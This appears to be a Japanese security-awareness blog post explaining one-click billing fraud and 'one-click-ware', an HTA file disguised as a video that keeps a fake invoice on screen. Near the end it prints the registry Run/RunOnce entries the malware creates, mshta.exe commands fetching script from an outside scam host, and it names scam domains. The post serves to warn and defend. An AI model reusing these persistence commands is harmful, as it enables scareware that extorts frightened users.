【GW特別企画!】未だに根強く残るワンクリ詐欺!その仕組みを知ろう!!(ワンクリウェアを用いた感染手法について)

【スポンサーリンク】

皆様、こんにちは。

ゴールデンウィークの後半、いかがお過ごしでしょうか?

それでは今回の投稿にまいりましょう。

【スポンサーリンク】

未だに根強く残るワンクリ詐欺

さて本日の投稿では上記のようなマルウェアの一つであり、日本独特のマルウェアと言われているワンクリウェアについて焦点を当てていきたいと思います。

皆様もワンクリ詐欺という言葉を一度は聞いたことがあるでしょう。ASCII.jpデジタル用語辞典の解説では、左記のワンクリ詐欺について以下のように定義しています。


ネット上で行われる架空請求詐欺のひとつ。携帯電話、パソコン上のサイトやメール上に載っているリンクボタン、URLをクリックすると、なんらかの料金を請求する画面が出る。そこには、クリックした人間が払うべき金額と振込先の口座が表示されている。悪質なワンクリック詐欺になると、あたかもクリックした人間の個人情報を手に入れかのように見せかけ、払われなかった場合は制裁措置を行なう、などの様々な重圧をかけてくるものもある。


つまりワンクリ詐欺というものは、実際に契約が完了したかのように装いアクセスした方より金銭を騙し取ろうとする詐欺の一種であるということですね。

そしてこのワンクリ詐欺というものが多く見受けられる事例として、アダルトサイトが非常に多いということです。以下をご覧ください。

アダルトサイト詐欺6億円 エスカレートする手口

上記の記事内で書かれている内容によると、【アダルトサイトの架空請求・ウイルス感染で110万人がウイルス感染、そのうち1万人がお金を払ってしまい、被害総額は6億円に達すると見られている】ということだそうです。

なお上記の記事はほぼ1年前に書かれた記事です。インターネットが普及してかなりの年月が経過しても、未だに根強く残る詐欺の一つであるということがご理解いただけるはずですね。

あかしや親爺のワンクリック・架空請求対策本部 – エムペ!

なおワンクリ詐欺契約については、法律的に違法であり、契約自体が無効であることはすでに様々なサイトで書かれていることでもあります。法律的な詳細をご理解されたい方は、以下のあかしや親爺さんのサイトをご覧いただければと思います。

【スポンサーリンク】

ワンクリ詐欺の手口

さてそれでは逆に、なぜこれほどまでに一般的に認知されているワンクリ詐欺について騙される方がいるのでしょうか?

上記の疑問についての理由の一つが、ワンクリ詐欺業者の騙しの手口が言えると思います。以下の画像をご覧ください。

20120208052914f16

この画像はあるワンクリサイトの請求画面です。少々見ずらいですが、赤枠の部分をよくご覧ください。

この部分にはワンクリサイトが、あたかもアクセスした方の個人情報を取得したかのような記載がなされています。

>IPアドレス

>プロバイダー名

上記のような情報ですね。しかしこのような情報はどのようなサイトにアクセスしてもサイト管理者が知りえる情報に過ぎないということなのです。以下を見てください。

rog

当ブログにおいても訪問される方々の情報は、アクセスログという形で残っています。上記のワンクリサイトの画像に記載される情報というのもこれと同じなのですね。そして重要なことは、左記のようなアクセスログ情報でアクセスされる方々の個人情報を取得することは出来ないという点です。

しかしネットをご利用される方々の中には、上記の点について知らない方も多いということ事実ですね。そして左記の盲点をワンクリ詐欺業者はあたかも個人情報を取得したかのように装い、騙しの手口に利用するというわけです。

そしてもう一つ。ワンクリ詐欺に対する対処方法としては無視することが1番ということはすでに知られている方法の一つでしょう。

しかしワンクリ詐欺の中には、無視するだけでは対処することが出来ない事例も存在します。それこそが今回のテーマであるワンクリウェアというものです。

ワンクリウェア(ワンクリクリックウェア)とは?

それではワンクリウェアとはどのようなものでしょうか?

通常のワンクリ詐欺というものは、単に請求画面が表示されるだけに過ぎません。つまり表示された請求画面を無視し、画面を閉じれば問題はないのです。

しかしこのワンクリウェアを用いた手法においては、請求画面が表示され続けるという症状が発生します。

つまり無視するだけでは請求画面の表示を削除することが出来ないということですね。

そしてこのワンクリウェアという名称については、salaさんのページにおいて以下のように定義されています。


2005年7月頃から使われ始めました。 新造語ですから、まだ定義がよく浸透していないんじゃないかと思います。

この悪意のあるプログラムを呼ぶのに、「ウィルス」じゃないし、「スパイウェア」でもない、どう呼べばいいだろうか? と考えた方がいらっしゃいます。

マルウェアに違いないけど、これじゃ広すぎてダメ。 自己増殖もしないし、システムにダメージを与えるわけでもなく、他のファイルを改ざん・削除するわけでもないからウィルスでもない。 メールアドレスをスパイしていくから、広義のスパイウェアには違いない。 勝手に某サイトにアクセスするけど、バックドアを付けるワケでもないし、トロイの木馬というのも少し違う。

日本独特で、他に類を見ないマルウェアで、ワンクリサイトで見られるから、「ワンクリウェア」と呼ぼう、ということで名前が付きました。 この呼び方を被害対策掲示板で使っているうちに、メディアが拾っていって一般化された呼び名です。


ワンクリ詐欺+マルウェア(悪意あるプログラムの総称)=ワンクリウェア

ワンクリウェアとは、上記のような図式から新しい造語として派生した名称ということでしょうか。

定義内でも書かれていますが、ワンクリウェアというものは正確な意味でのコンピュータウイルスではありません。特に近年のワンクリウェアについては、windows標準のhtml形式を悪用した請求画面を表示し続けるタイプが主流であり、PC内のメールアドレスを外部に送信するといった挙動も見受けられません。

つまりワンクリウェア自体が、他のマルウェアに見受けられるようなお使いのPCにダメージを与える及びPC内の個人情報を外部に送信するといった悪意ある挙動を示すことはないのです。

しかし問題なのはその表示され続ける請求画面であり、明らかな悪意を感じる画面ですね。

このワンクリウェアというものはウイルス的な挙動はないものの、PCを利用する方々の盲点を突いた悪質なプログラムという点においては危険であることに変わりはないでしょう。

ワンクリウェアに関する仕組み

それでは次にワンクリウェアを用いた請求画面が表示されるまでの仕組みを簡単にご説明していきたいと思います。

まず仕組みをご説明するために、実例として以下のワンクリサイトを用いたいと思います。

【ワンクリサイト AV LOVE】

evc.pdvya.net

それでは始めましょう。以下の画像をご覧ください。

175875535_624.v1394174904

上記の画像がサイトの入り口となります。20歳以上入り口をクリックして進んでみます。

上記の画面をよく見てください。うっすらと画面上部・下部にに何か文字が書かれていますね。この先の画面からは料金がかかるということ、また利用規約をよく読むことが書かれています。

175875556_624

そうしますと早くもアダルト動画の再生画面が表示されます。さらに再生画面をクリックしていきます。

175875584_624

この画面はいわゆるワンクリサイト側のいう年齢認証の画面ですね。さらにクリックしていきます。

175875614_624

上記の画像をよく見てください。うっすらとした文字で画面上部・下部に何か書かれていますね。

この部分にはこれより先の画面より料金がかかるということ、また利用規約をよく読んで下さいということが書かれています。

電子契約を行う際の法律では、契約画面において明確な料金の表示や利用規約の明示を行わなければいけないと定められています。そのためワンクリ詐欺業者によってはこのように見えにくいように表示することにより、契約完了という請求画面を表示する際に規約の有効性を主張する内容を記載することがあります。もちろん左記のようなものでは契約に関する錯誤となると思いますが。

さてそれではさらに動画を見るをクリックしていきます。

175875642_624

MovieID_英数字の羅列_IE.wmv

ファイルをダウンロードする画面になりました。これこそがワンクリウェアのファイルです。ファイルの名称を見る限り、動画ファイルと勘違いされる方もおられることでしょう。しかしこれは動画ファイルではありません。

ワンクリサイト5

赤枠の部分からもご理解いただけるように、HTAファイルですね。このようにダウンロードするファイルをあたかも動画ファイルのように装うこともワンクリ詐欺業者の手口です。どうかご注意ください。

仮に先のファイルをダウンロードする画面にて開くを選択してしまっても、以下のような警告画面が表示されるはずです。

ワンクリサイト6

この画面にて赤枠の部分をよく確認すれば、ワンクリウェアの感染を防止することも出来るのですが、ほとんどの方々は見ることはないでしょうか…。

さて以上がワンクリウェアに感染するまでの仕組みです。それでは感染後の仕組みについても簡単にご説明しておきたいと思います。

今回の検証に用いましたワンクリウェアでは、感染後に以下のような画面が表示されるようになります。

175875760_624.v1394118743

ワンクリサイト9

この画面がなぜ表示され続けるのかということですが、ワンクリウェアの感染時にレジストリとタスクスケジューラに不正な値が作成されているからです。


O4 – HKCU\..\Run: [SystemBootUGxNO3xpAbdyGPAqWG1VOMazO74lkOxC] mshta.exe http://zro.kibrc.net/reg2.php?cccid=UGxNO3xpAbdyGPAqWG1VOMazO74lkOxC&log=1 O4 – HKCU\..\Run: [RegWriteUGxNO3xpAbdyGPAqWG1VOMazO74lkOxC] mshta.exe http://zro.kibrc.net/set_inf2.php?cccid=UGxNO3xpAbdyGPAqWG1VOMazO74lkOxC O4 – HKCU\..\RunOnce: [RegWriteUGxNO3xpAbdyGPAqWG1VOMazO74lkOxC] mshta.exe http://zro.kibrc.net/set_inf2.php?cccid=UGxNO3xpAbdyGPAqWG1VOMazO74lkOxC


ワンクリサイト10

今回の検証に用いましたワンクリウェアは、タスクスケジューラ登録型と呼ばれるタイプのものです。一概にワンクリウェアといいましても複数のタイプが存在し、それぞれのタイプにより削除方法も異なりますのでご注意をお願いしたいと思います。

以上がワンクリウェアに感染後の仕組みの概要です。もう少し細かく記載すべきかもしれないですが、今回の主題はあくまでワンクリウェアの感染防止ですから、この辺にしておきたいと思います。

いかがだったでしょうか?最後になりますが、ワンクリ詐欺というものは人の恐怖心を煽り立てる詐欺です。

皆様におかれましてはどうかご注意をお願いしたいと思います。

あとがき

さて今回の投稿は以上となります。

今回の投稿で記載する記事以外のワンクリウェアの対策方法に関連する記事に興味がある方は、ぜひ一度以下のワンクリウェアの対策方法に関連する記事のまとめを参照してください。


<ワンクリウェアの対策方法に関連する記事のまとめ>

1、URL

ワンクリウェアの対策方法に関連する記事のまとめ


それでは以上です。